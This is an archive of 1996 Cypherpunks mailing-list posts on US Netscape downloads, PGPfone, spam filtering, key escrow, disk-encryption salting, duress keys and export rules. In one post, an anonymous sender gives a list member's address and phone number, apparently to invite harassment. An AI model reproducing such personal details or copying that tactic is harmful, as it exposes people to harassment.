Date: Fri, 19 Jul 1996 04:21:59 +0800
To: cypherpunks@toad.com
Subject: Re: overseas PGPfone and Netscape
In-Reply-To: <01BB74A5.CDC6BC00@JPKroepfli.S-IP.EUnet.fr>
Message-ID: <4slmrl$a80@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <01BB74A5.CDC6BC00@JPKroepfli.S-IP.EUnet.fr>,
Jean-Paul Kroepfli  <JeanPaul.Kroepfli@ns.fnet.fr> wrote:
>I've seen some threads about (1) the new PGPfone, (2) the new US-version of Netscape and leakage.
>So my question:
>[Important] Do you know some non-US URL with the latest version of PGPfone for Win?
>(I monitored the usual European repositories quasi day to day, but it was always the old version)
>[Less important] Ibid. for the new US-Netscape (with full 128-SSL)
>(I suppose there is a copyright problem for such a -hum- mirroring)
>Best regards,
>Jean-Paul

I haven't tried to download it myself, yet (I'm on the wrong side of a
slow link <plug>(though it's faster since I got my new ZyXEL
yesterday)</plug>), so maybe this is explained for me, but does netscape
publish checksums for their US binaries?

This isn't just an issue of making sure your copy wasn't munged in transit;
without checksums, what's stopping netscape from embedding the info you
provide in the binary before shipping it to you, so that if it shows
up on hacktic, they know who did it?

Could various people with various architectures post MD5 or SHA1 hashes
of the files they downloaded?

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMe5elUZRiTErSPb1AQF1DQP/b8o5CZvG49kXY+N9SCNEN+72oX/l6NrC
9WX6UqoY2Qr+OdWLTcYVwUjVqFwMnSFaY9bcTpf8/6zkeDznk2RfDPI1Idw/W80N
OxqSZv0Kp3Ng8ibpRvOXkEKLvu/WXlnUMldLv4VQginYvNPEvKkLOiRNpMnArNwj
+aohOGJ03/8=
=Xni4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Fri, 19 Jul 1996 02:20:31 +0800
To: cypherpunks@toad.com
Subject: Re: spam suckers (was Re: Chancellor Group....)
In-Reply-To: <199607171827.LAA12519@niobe.c2.net>
Message-ID: <doug-9606181411.AA022412492@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



>
>	FYI: I've been forwarding complaints about the moneyworld spam
>to the following addresses:
>
>dyno@cyberspace.com
>barer@cyberspace.com
>abuse@mci.net
>enforcement@sec.gov
>

Our site is being systematically spammed (slowly) one user at a time.
I setup a procmail filter that bounces the mail globally, and sends a
copy to hostmaster at mci.net (with a little note about litigation for
harassment and unauthorized use of resources for good measure.)
And yes, we just got another VRFY just now..


Tell tale signs:

If you start getting VRFY's from 208.129.19.69 (moneyworld.com) then
you're going to receiving email from chag@moneyworld.com very shortly
thereafter.

(for those unaware - VRFY is an SMTP command to verify an email address.
Some sites disable them, other sites trap them, some do nothing at all)

I don't know who the right person to complain to is, but it sure is
irritating. I think I'll start CC'ing abuse@mci.net as well.

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Date: Fri, 19 Jul 1996 01:11:36 +0800
To: "jim bell" <cypherpunks@toad.com>
Subject: Re: Symantec's Your Eyes Only
Message-ID: <AE13B1B7-A50D82@193.239.225.200>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> wrote:
>At 11:57 AM 7/16/96 -0400, Clay Olbon II wrote:
>
>>Now my $.02.  I am concerned about the lack of a distinction between
>>transient communications and stored data.  This is apparent in the GAK
>>proposals, but is also increasingly apparent in mainstream corporate
>>products such as this one and ViaCrypt BE.  It is apparent (to me anyway)
>>that corporate access to stored data (data owned by the company, on
>>machines owned by the company) is probably necessary.  I do not see this
>>same need for access to transient communications.  Am I way off base on
>>this one?
>
>
>This has been mentioned a number of times by various people.  It should be

>obvious that it is pointless to escrow the key of a data stream that you
are 
>not recording, such as a telephone conversation.  Also, if you have no 
>permanent need for that data (also, the telephone conversation) it is 
>unnecessary.  As might be expected, however, the proponents of GAK don't 
>distinguish between keys for storage and keys for communication.  
>
>Such an oversight is predictable.  It's likely that governments will  be
>more 
>interested in keys for communication, because the data is far more easily 
>(and secretly) accessible.  Were they to admit that nobody has a need for 
>his own communication data key, they'd lose a substantial fraction of
their 
>target data.
>

My point was not that govts want to escrow communication keys, it was that
this is appearing more and more in commercial products marketed to
businesses.  I run the computer system for a small office and I would
rather not see employee email - maybe I am just naive.  However, there
obviously is a demand for this type of product.  It must come from either a
lack of understanding of crypto, or a freeh-style authoritarianism on the
part of corporate executives.  I wouldn't rule either one out.  If it is
the latter, I'm not sure there is anything we can do.

	Clay  

***************************************************************************
Clay Olbon II       *      Clay.Olbon@dynetics.com
Systems Engineer    *    PGP262 public key on web page
Dynetics, Inc.      * http://www.msen.com/~olbon/olbon.html
***************************************************************** TANSTAAFL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Fri, 19 Jul 1996 02:15:46 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <ae1308450f021004a134@[205.199.118.202]>
Message-ID: <doug-9606181433.AA022512492@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




If people break into my house with the element of surprise wearing
all black in the middle of the night, they have the element of surprise
FIRMLY on their side.. I'd have to believe that reaching for a gun
was the most stupid thing I could do in the entire world in this sort
of circumstance. 
"You'd be right, but you'd be dead" - Dr. SNMP

 If you don't reach for a gun, at least you have the 'chance' for
restitution on your side. If you're dead, you have no options.

nuff said.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Seth I. Rich" <seth@hygnet.com>
Date: Fri, 19 Jul 1996 01:08:48 +0800
To: lyalc@ozemail.com.au>
Subject: Re: Cybank breaks new ground; rejects public-key encryption
Message-ID: <199607181335.JAA28123@arkady.hygnet.com>
MIME-Version: 1.0
Content-Type: text/plain


C Matthew Curtin (cmcurtin@megasoft.com) wrote:

>People need to learn that the sort of snake oil that is being sold as
>"secure" just won't cut it. Your concern for the customers of Cybank
>is valid, however, so I propose something along these lines:
>
>Announce, very publicly, such that every Cybanlk customer would hear
>about it in time, that you have cracked their hokey little non-crypto
>scheme, and that you intend to publish your work in a full-disclosure
>paper to be published on Month Day, Year. [...]

I chuckled when this whole Cybank thing started.  Only a month or so
ago, they had some funky bug in their mail system such that all their
internal email was being cc'd to the First Virtual users' mailing list
(and also to one poor individual).  They were helpless and completely
unable to figure it out, as we watched their (not very happy) internal
messages float unrequested into our mailboxes.

Seth
---------------------------------------------------------------------------
Seth I. Rich - seth@hygnet.com            "Info-Puritan elitist crapola!!"
Systems Administrator / Webmaster, HYGNet             (pbeilard@direct.ca)
Rabbits on walls, no problem.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Date: Fri, 19 Jul 1996 01:28:19 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: ABC News on internet telephony
Message-ID: <AE13B74A-A65CB8@193.239.225.200>
MIME-Version: 1.0
Content-Type: text/plain


There was a pretty long piece on the evening news on using the internet for
long distance and how much money can be saved.  Even had several demos of
intercontinental phone calls.  The disappointing aspect was they didn't
mention PGPfone (although if they had, I'm sure child pornographers and
terrorists would have been mentioned as well :-)  

	Clay

***************************************************************************
Clay Olbon II       *      Clay.Olbon@dynetics.com
Systems Engineer    *    PGP262 public key on web page
Dynetics, Inc.      * http://www.msen.com/~olbon/olbon.html
***************************************************************** TANSTAAFL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Fri, 19 Jul 1996 04:58:00 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: "address verification databases"? (was: Netscape download...)
Message-ID: <9607181646.AA19157@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


So... I just have to know someone's name and phone
number in the US?  

     Ryan


---------- Previous Message ----------
To: tcmay
cc: cypherpunks
From: jsw @ netscape.com (Jeff Weinstein) @ smtp
Date: 07/18/96 12:47:22 AM
Subject: Re: "address verification databases"? (was: Netscape download...)

Timothy C. May wrote:
> 
> At 9:45 PM 7/17/96, Jeff Weinstein wrote:
> 
> >  Because we have not yet been able to obtain the address verification
> >databases that we need for Canada.  There is someone working on
> >tracking this down right now.  When we get the proper database we
> >will add access to canada.
> >
> >        --Jeff
> 
> Jeff, can you tell us anything more about what these "address verification
> databases" are?
> 
> For example, are they derived from government sources? Census data? (Naw,
> can't be, for at least two obvious reasons). Voting records? (Naw.) Credit
> card purchases? (??)

  Our database was obtained from American Business Information.
They make those CDROMs with 11 million business names and addresses,
and other such products.  There is a link to their web page from our
US download page.

> While I can imagine various commercial firms have indicators that a "T.
> Christopher May" once lived in Rio Del Mar (the name of a town I lived in,
> though not an official "Postal Service" address), I really find it odd
> that, for example, there would be any database that could "parse" the
> informal information people provide (absent a well-defined set of addresses
> and precise spellings).
> 
> In case I'm not making myself clear, there are no "official" addresses of
> persons in the U.S! Not even the tax system requires registration of all
> persons and specific addresses. This has come up in several "voter's
> rights" cases, where persons with no fixed address were nevertheless able
> to vote. If I, T.C. May, say my address is Moonbeam Trailer Park, who's to
> say it's not? Maybe it's where I'm staying with a girlfriend, maybe it's
> where I get my mail, maybe it's my spiritual home. And yet just which
> "address verification database" could possibly confirm that I live in (or
> get my mail at the Moonbeam Trailer Park at this exact moment? Absent any
> laws clearly defining what one's official name is, official phone number
> is, official zip code is, official address is, etc., just about anything we
> choose to put down on the Web form is kosher.

  Our verification software does not check that the person whose name
is entered in the form lives at the address entered in the form.
We do verify some parts of the information entered.  Things like
is the state code one of the 50 states, does the zip code match
the state, etc.  (NOTE - these may not be the exact checks implemented
currently.  I have not examined the code myself, but these are the
types of checks being done.)

> At least the MIT system was based on ISP domain names, crude as this is,
> and not on putative names and residential or business addresses.

  We also screen out based on domain names.

> Anyway, I don't know if Netscape is rejecting the information I'm providing
> them, as I've been unable to get through in roughly 30 connect attempts.

  We will be increasing capacity soon.  The demand is very high.  It
costs
us real dollars to buy hardware and T3 lines to allow people to download
the software for free.

> But I'm still curious about what these "address verification databases."
> Sounds ominous to me.

  I'm sorry that my choice of words disturbed you.  I hope my
explanation
will allay at least some of your fears.  There are many people here
(including Jim Barksdale) who are very concerned about maintaining
personal privacy.  Certainly if we could we would make the US versions
of our software available in the same way that we currently make
the export versions available.  At least people now have the choice
of obtaining the US version over the internet.

 --Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 19 Jul 1996 05:40:27 +0800
To: cypherpunks@toad.com
Subject: Re: US versions of Netscape now available
Message-ID: <2.2.32.19960718165727.00aa42c4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:35 AM 7/17/96 -0700, Yap Remailer wrote:

>Have you heard any reports of anyone successfully downloading it
>period?  Netscape always times out in the middle of a download.  I
>think the server is so overloaded that it's actually impossible to
>download the software.

Yep.  Got it just after the announcement.  Came through fine.  (After that,
i could not get it to download anything, but the first try worked fine.)

Sounde like it is overloaded.  (Of course, since it is mentioned on their
homepage and they only have one machine serving it, what do you expect?)

>I sure wish there were an ftp site overseas somewhere, then I could
>actually get the damned thing.

Give it a week and i am sure that someone will have it available.  Something
announced this far and wide will manage to leak out somewhere...

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Fri, 19 Jul 1996 05:10:59 +0800
To: cypherpunks@toad.com>
Subject: Re: Sternlight on C'punks
In-Reply-To: <v02120d0fae1205c776bd@[192.0.2.1]>
Message-ID: <v03007601ae141d914869@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:35 PM -0700 7/16/96, Lucky Green wrote:
>At 14:42 7/16/96, Peter D. Junger wrote:
>>How does one set up a kill-file for a mailing list?  I run a Linux box
>>with sendmail and use the MH mail system.
>>
>>My best guess is that I will have to install procmail, but would like
>>your advice before going to a lot of labor.
>
>Procmail is the way to go.

Peter Junger posted some assertions about how something becomes "public
domain" as far as ITAR is concerned. I asked a triaging question to clarify
his concepts for myself, and to resolve what seemed to me to be at least a
lack of clarity in his assertions. He didn't respond; instead of a rational
response to a polite substantive question, he asks about kill filing.

Does the sequence of events tell you anything?

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Fri, 19 Jul 1996 04:38:45 +0800
To: cypherpunks@toad.com
Subject: RE: Cypherpunks and Toad.com
Message-ID: <199607181616.KAA13409@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


root@HellSpawn wrote:

>I'd like to put the words 
>
>Cypherpunks@toad.com
>
>On a tee-shirt.  Is cypherpunks, toad.com, or the combination thereof 
>copyrighted or trademarked or otherwise limited for use? 

Not that I know of, and you are of course free to do anything you want,
but I urge you to leave off the "@toad.com" to prevent clueless subscription
requests/noise. There are a number of cpunk tshirts already, one of which
contains TCM's sigfile, so the word is likely not copyrighted???









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Fri, 19 Jul 1996 05:24:06 +0800
To: cypherpunks@toad.com
Subject: Re: (fwd) Re: US versions of Netscape now available---NOT
In-Reply-To: <199607181206.OAA14091@basement.replay.com>
Message-ID: <v03007603ae14223a6068@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:06 AM -0700 7/18/96, Anonymous wrote:
>Sternlight writes:
>
>: >>Yes.  We've had a few thousand people download it.  Unfortunately, we
>: >>only have one machine serving downloads right now, and it tends to melt
>: >>down a couple times a day.
>: >
>: >I've tried four times, and each time has timed out. (That is, I've filled
>: >out the Web form four times and tried n times each iteration...at least I
>: >get to experiment with variations on my name and address each time :-})
>: >
>: >I guess I'll have to connect to the Italian and/or Swedish sites again. Has
>: >the software arrived there yet?
>:
>: Very droll. I had no trouble downloading it first try. Perhaps you should
>: switch to Netcom. :-)
>:
>
>Tim you may use this as entry data:
>
>   Whatever YaKnow
>   cybernut@nutcom.com
>   10401 Wilshire Blvd, Suite 805
>   Los Angeles, CA 90024-4628
>   (310) 475-3799
>
>
>Your friend.

Isn't that nice. Some creep is proud enough of his skill at accessing the
trivially available InterNIC finger data that he posts it to invoke
harassment. And being a coward as well, he hides behind an anonymous
remailer.

David







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 19 Jul 1996 02:21:03 +0800
To: Edgar Swank <edgar@Garg.Campbell.CA.US>
Subject: Re: SecureDrive(IDEA), Realdeal and plaintext attack
Message-ID: <9607181432.AB05188@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Cc:  cypherpunks@toad.com
	galactus@stack.urc.tue.nl
	Iolo Davidson<iolo@mist.demon.co.uk>

On 18 Jul 96 at 4:19, Edgar Swank wrote:

> JFA wrote:
> > Question:
> >
> > Since realdeal overwrite everything with 0s, and that theses
> > zeroed sectors are encrypted later with IDEA, will that give an
> > attacker an edge?  The attacker will likely know that there are
> > large disk areas that contains 0s.
> >
> > Any comments?


> Yes.  Each sector encrypted by SecureDrive also incorporates a "salt"
> value derived from the sector address and (usually random) volume
> serial.  So encrypted zeroed sectors will be different from each other
> and (without the IDEA key) cannot be distinguished from sectors
> containing data.

IDEA is reputed to be resistant against known plaintext attacks.
But I did not read about wether or not it is resistant to 
several-plaintexts (?choosen plaintext) attack.

If the sectors were not salted, each zeroed sectors would translate in 
an identical way on the encrypted disk.  So, there would be only one 
cyphertext-plaintext pair repeated over many empty sectors.

If you salt the encryptor, there are many different cyphertexts 
corresponding to one single plaintext.

Can the salt be figured out by an attacker?

If yes, would the many-cyphertext to single-ultimate-plaintext could give an 
edge to an attacker?

In that case, it would be effectively better to not wipe a drive with 
zeroes.

The problem is, realdeal cannot be turned selectively for only one 
drive while not wiping the other one.

Thanks for your reply.

JFA
 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants: physicists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Thomas <jthomas@webwonderinc.com>
Date: Fri, 19 Jul 1996 03:19:25 +0800
To: cypherpunks@toad.com
Subject: Encrypted files in terror case
Message-ID: <31EE3FA8.5219@webwonderinc.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from a N.Y. Times News Service piece available at
http://www.nando.net/newsroom/ntn/info/071896/info12_18308.html :


NEW YORK (Jul 18, 1996 02:00 a.m. EDT) -- In the seven weeks since the
trial of Ramzi Ahmed Yousef began, the case, charging a plot to blow
American jumbo jets out of the sky, has come to hinge on one off-white
laptop computer.

[Most of the story, dealing with the defense contention that Philipine
police altered files on the laptop, deleted.]

Several witnesses reported that some computer files were in code, part
of which the police could not decipher. Last week, after the jury
adjourned for lunch, Duffy [the judge in the case] prodded the defense
to point out that encoding files was not unusual and that some software
programs offer such an option.

"I don't want the jury to think that encryption is something that only
bad guys do," Duffy said.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 19 Jul 1996 02:53:22 +0800
To: cypherpunks@toad.com
Subject: Adapting PGP to other languages
Message-ID: <199607181505.LAA17747@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 17 Jul 96 at 18:10, anonymous-remailer@shell.port wrote:

> Does anyone know how to tanslate PGP into Burmese?

The PGP sources have a language tool in the 'contrib' directory for 
translating the language files.

Being fluent in 'Burmese'  or whatever language you want to translate 
it to is helpful.

Rob
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 19 Jul 1996 02:56:28 +0800
To: EVERHART@Arisia.GCE.Com
Subject: Re: Making encoding out of an authentication cipher
Message-ID: <199607181505.LAA17741@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 17 Jul 96 at 19:36, EVERHART@Arisia.GCE.Com wrote:

> Had an interesting thought, maybe worth passing on for commentary.
> 
> (...since "authentication" ciphers are considered "harmless" by
> those interested in spying on your info...)
> 
> Suppose you have a secure hash function H(msg) that delivers a random
[..]

There's a section in Schneier's Applied Cryptography about using hash 
algorithms for ciphers.  There are several ways of doing this, 
although some are stronger than others.

One you adapt the hash algorithm to a cipher, it's a cipher, not a 
hash algorithm, and is regulated.

Rob
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 19 Jul 1996 03:12:18 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: Crypto 96
Message-ID: <199607181505.LAA17744@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 17 Jul 96 at 16:45, Hal wrote:

> Crypto 96 is coming up in about a month.  This looks like a more
> interesting program than last year, IMO.  According to the preliminary
[..]

> Key-Schedule Cryptanalysis of IDEA, G-DES, GOST, SAFER, and Triple-DES
>    John Kelsey, Counterpane Systems, USA
>    Bruce Schneier, Counterpane Systems, USA
>    David Wagner, Univ. California at Berkeley, USA
> 
> 	There are actually several cryptanalysis type papers for which
> 	I can't tell from the title whether they will be big new
> 	results or not.  Anybody know what "key schedule" cryptanalysis
> 	is?

The way a key is transformed into a larger key or S-box. I assume 
cryptanalysis of these means that there may be weaknesses which can 
be exploited.

Rob


 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jean-Paul Kroepfli <JeanPaul.Kroepfli@ns.fnet.fr>
Date: Thu, 18 Jul 1996 21:27:04 +0800
To: "'Cypherpunks list'" <cypherpunks@toad.com>
Subject: overseas PGPfone and Netscape
Message-ID: <01BB74A5.CDC6BC00@JPKroepfli.S-IP.EUnet.fr>
MIME-Version: 1.0
Content-Type: text/plain


I've seen some threads about (1) the new PGPfone, (2) the new US-version of Netscape and leakage.
So my question:
[Important] Do you know some non-US URL with the latest version of PGPfone for Win?
(I monitored the usual European repositories quasi day to day, but it was always the old version)
[Less important] Ibid. for the new US-Netscape (with full 128-SSL)
(I suppose there is a copyright problem for such a -hum- mirroring)
Best regards,
Jean-Paul
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
Jean-Paul et Micheline Kroepfli      (our son: Nicolas and daughter: Celine)
eMail: JeanPaul.Kroepfli@utopia.fnet.fr    Also Compuserve and MSNetwork
Phone: +33  81 55 52 59  (F)          PostMail: F-25640 Breconchaux (France)
   or: +41  21 843 27 36 (CH)               or: CP 138, CH-1337 Vallorbe
  Fax: +33  81 55 52 62                                        (Switzerland)
Zephyr(r) : InterNet Communication and Commerce, Security and Cryptography consulting
PGP Fingerprint : 19 FB 67 EA 20 70 53 89  AF B2 5C 7F 02 1F CA 8F
"The InterNet is the most open standard since air for breathing"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@atlas.ex.ac.uk>
Date: Fri, 19 Jul 1996 08:52:00 +0800
To: jim@ACM.ORG
Subject: Re: Opiated file systems
In-Reply-To: <199607162030.NAA10344@mycroft.rand.org>
Message-ID: <199607181001.LAA00078@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Jim Gillogly <jim@acm.org> writes:
> "Deranged Mutant" <WlkngOwl@unix.asb.com> writes:
> >A problem with a c'punk-style encrypted fs with source code and wide 
> >distribution is, of course, that attackers will KNOW that there is a 
> >duress key.
>
> Good point.  This suggests a design desideratum for any such system should
> be that the user may choose not to have a duress key, maintaining
> semi-plausible deniability for those who choose to have one.

For plausibility it would probably be best if very few people used the
duress key feature.

If PGP had an infrequently used duress key feature, it would provide
quite a bit of plausible deniability: lots of people have PGP.

This was the basis for comments earlier in this thread about it being
desirable to have a very popular file system with these features
included.  The more users (mostly for it's normal features) the less
suspicious having the software on your system becomes.

One problem is that some of the additional requirements to do a good
job of obscuring whether or not there is data in the unused part of an
encrypted file system add overheads.

For example re-encrypting the unused data with random IVs so that it
doesn't appear stale even if the duress key feature was not requested.
If that overhead is too great it will be annoying for people who do
not wish to use the duress key feature.  It might possibly be a good
idea to do re-encrypting of the blocks anyway as it would obscure
usage patterns.  (eg I am thinking when the disk starts up it will be
cold, as it warms up the heads will be positioned fractionally
differently, and from this kind of analysis it might be possible to
make inferences about the amount of data used in the file system,
etc.)

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 19 Jul 1996 08:20:19 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Surf-filter lists
In-Reply-To: <klvNtWK00YUq14yB40@andrew.cmu.edu>
Message-ID: <199607181803.LAA01203@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>L.D. fails to say why NOW and gay history sites and gun rights sites and
>EFF and LPF and SAFE @ MIT and HotWired should be blocked.

absolutely no reason is necessary. when a parent says to their
child, "because I said so", what recourse does that child have?
the service is doing the equivalent of this, and will be appropriate
for and appeal to the many parents who raise their children in this 
authoritarian manner.

a company does not have to give reasons. as TCM just wrote, people
will vote with their cash. the ultimate determinant is if the company
is profitable under a capitalist system. they could have ex-nazi's
doing the filtering, and if they are making money even when their
customers know about it, what's the problem?

now, Meeks is doing a valuable public service in *informing* the
public of criteria customers may be interested in they may
not have been previously aware of (to the minor extent that
he did so in an objective way). however, they
are the ones to make the decision. they may decide that they 
like the whole idea of secrecy. the market is deciding as we
speak. the article is in a sense part of this decision-making
process. your own opinion is not irrelevant-- I have never said
that. it's a nice additional perspective. 
I'm only saying its a small factor and you're awfully
presumptuous to think everyone (esp. those that use the services)
feels the same way about a lot
of subjective material as you do.

McCullagh, have you thought out your position at all on this? all the 
responses I have gotten from you show you haven't put much thought into the
matter and are quite caught off guard by my fairly basic points.

let me ask you: Yahoo *routinely* rejects zillions of URLs
submitted to them. an equally emotional article could be written
that highlights their editorial decisions in borderline cases.
"Yahoo rejected a link to [x]!!! that's censorship!!!". please
figure out what you are and are not opposed to, and have a 
clearcut stand. don't you see the amazing similarity between
rating services and Yahoo? what, in principle, is the difference?
your own arbitrary opinions?
 
 He also fails
>to understand that Brock and I both wrote the article.

the article is ambiguous about who wrote what.  It's clearly
Meeks writing style. I give you credit for whatever research you
contributed. if I were you I would not want to be associated
with that particular article however <g>

> He finally fails
>to understand that CyberPatrol's categories are anything but clear.

I don't recall the service you were picking apart in particular, but
I thought Meeks ranting over the "monkey with his eye poked out"
as not necessarily "gratuitous depictions of violence" was a real
big lose position for himself.  the categories may be clear enough
for the *customers*, i.e. parents, and that's all that matters. you
can rant all you want, but if people are paying money and continue
to do so in spite of your objections, where does that leave the
validity of your opinion?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Fri, 19 Jul 1996 06:34:07 +0800
To: cypherpunks@toad.com
Subject: Re: ABC News on internet telephony
In-Reply-To: <AE13B74A-A65CB8@193.239.225.200>
Message-ID: <v03007606ae142ab45e4b@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:41 AM -0700 7/18/96, Clay Olbon II wrote:
>There was a pretty long piece on the evening news on using the internet for
>long distance and how much money can be saved.  Even had several demos of
>intercontinental phone calls.  The disappointing aspect was they didn't
>mention PGPfone (although if they had, I'm sure child pornographers and
>terrorists would have been mentioned as well :-)
>

There's something fundamental going on here beneath the surface.
Surprisingly, a recent item (maybe the one you reported) on this suggests
that the big phone companies are trying to use this phenomenon rather than
stop it. I think it was AT&T who announced that they had web software that
improved the quality of such internet voice calls. Surprisingly
constructive, in contrast to the coalition of small phone companies
screaming for the FCC to "stop it". The FCC has wisely said they're not
going to act right now because it could kill an incipient new technology.

This is the rankest speculation on my part, but could some of the bigger,
smarter phone company cum internet providers have done some serious
analysis and concluded that we're moving away from distance-based rates for
voice calls. Might they even have examined where we'll be in the next ten
years (with ADSL, etc.) and decided that the network technology and simple
market economics makes fixed charges per "line" more profitable to them
than metered usage? Maybe this is wishful thinking on my part, but some of
the bigger actors are starting to behave in a surprisingly
counter-intuitive (based on the way we stereotype them) fashion on this
topic.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Fri, 19 Jul 1996 06:32:44 +0800
To: cypherpunks@toad.com
Subject: Re: New Infowarfare Panel
In-Reply-To: <ae12fd2f0c021004065b@[205.199.118.202]>
Message-ID: <v03007607ae142d52fbb1@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:30 PM -0700 7/17/96, Timothy C. May wrote:

>Winn Schwartau is running conferences, is talking about the imminent danger
>of the nation's computer networks being knocked out (paraphrasing his
>latest "Wired" item: "imagine your ATM network being knocked out and people
>being unable to gain access to their money").
>
>Schwartau is predicting/advocating a "fifth branch" of the military to deal
>with the this threat. A cyberforce, as it were.
>
>Color me skeptical, but I see this all as a lot of hype and fear-mongering.
>Folks in the Pentagon, FBI, and NSA probably see it as a way to get more
>funding, Folks in the consulting business probably see it as a way to crank
>up the seminar prices and increase the number and frequency of "Information
>Warfare" workshops and seminars.

Haven't there been some worked examples of information warfare that make
this fear and the need to deal with it legitimate?

As I recall my background reading in the public press, wasn't the etiology
that we figured out how to do some pretty nasty things (the Gulf war was
one presenting occasion) to enemies' info infrastructures to threaten their
entire social system. Then, as I understand it, someone smart said
something like "If we can do this to them, then someone can do this to us."
and we were off to the races.

It's the military and counterintel community's job to think like this and
act to protect us. I don't think imputing selfish motives is dispositive.

David






